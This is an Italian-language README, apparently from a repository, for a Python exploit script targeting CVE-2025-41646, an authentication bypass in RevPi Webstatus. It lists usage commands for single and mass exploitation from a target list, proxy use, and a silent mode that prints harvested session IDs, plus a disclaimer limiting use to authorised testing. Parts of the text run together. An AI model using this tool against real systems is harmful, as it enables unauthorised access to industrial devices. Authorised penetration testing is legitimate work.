
Script di exploit Python per CVE-2025-41646, un bypass di autenticazione in RevPi Webstatus <= 2.4.5. Supporta sfruttamento singolo/massivo, proxy, modalità silenziosa e output JSON per test di penetrazione.
Questo è uno script exploit Python3 per CVE-2025-41646, una vulnerabilità di Bypass dell'Autenticazione che colpisce RevPi Webstatus <= 2.4.5.
/php/dal.phppip install -r requirements.txt
requests
urllib3 (di solito incluso con requests)
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100"
python3 cve_2025_41646_auth_bypass.py -l targets.txt
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100" --proxy "http://127.0.0.1:8080"
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100" --silent
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100" --json
richiesta/risposta
Questo strumento è solo per scopi educativi e test di penetrazione autorizzati. L'uso non autorizzato contro sistemi senza esplicita autorizzazione è illegale.
| Opzione | Descrizione |
|---|
-u, --url | URL del target (es. http://IP) |
-l, --list | File contenente l'elenco dei target |
-o, --output | File di output per salvare gli ID di sessione validi |
--proxy | Utilizza un proxy (http://127.0.0.1:8080) |
--json | Stampa l'output JSON grezzo |
--silent | Modalità silenziosa (stampa solo l'ID di sessione) |